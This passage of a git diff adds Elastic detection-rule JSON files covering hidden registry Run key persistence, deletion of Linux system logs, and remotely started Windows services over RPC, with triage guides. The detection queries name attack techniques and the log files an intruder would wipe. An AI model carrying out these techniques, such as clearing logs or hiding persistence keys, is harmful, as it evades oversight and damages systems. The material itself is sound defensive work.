"OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_108.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_108.json new file mode 100644 index 00000000000..4a0b080b6d1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_108.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Hidden Run Key Detected", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "references": [ + "https://github.com/outflanknl/SharpHide", + "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_110.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_110.json new file mode 100644 index 00000000000..295377c13f7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_110.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Log File Deletion", + "query": "file where host.os.type == \"linux\" and event.type == \"deletion\" and\n file.path :\n (\n \"/var/run/utmp\",\n \"/var/log/wtmp\",\n \"/var/log/btmp\",\n \"/var/log/lastlog\",\n \"/var/log/faillog\",\n \"/var/log/syslog\",\n \"/var/log/messages\",\n \"/var/log/secure\",\n \"/var/log/auth.log\",\n \"/var/log/boot.log\",\n \"/var/log/kern.log\"\n ) and\n not process.name in (\"gzip\", \"executor\", \"dockerd\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.002", + "name": "Clear Linux or Mac System Logs", + "reference": "https://attack.mitre.org/techniques/T1070/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "aa895aea-b69c-4411-b110-8d7599634b30_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_110.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_110.json new file mode 100644 index 00000000000..665c0d488be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_110.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote execution of Windows services over remote procedure call (RPC). This could be indicative of lateral movement, but will be noisy if commonly done by administrators.\"", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remotely Started Services via RPC", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable : (\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\ccmsetup\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\srmhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\"\n )] by host.id, process.parent.entity_id\n", + "references": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_111.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_111.json new file mode 100644 index 00000000000..3632c85ba09 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_111.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote execution of Windows services over remote procedure call (RPC). This could be indicative of lateral movement, but will be noisy if commonly done by administrators.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remotely Started Services via RPC", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable : (\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\ccmsetup\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\srmhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\"\n )] by host.id, process.parent.entity_id\n", + "references": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + 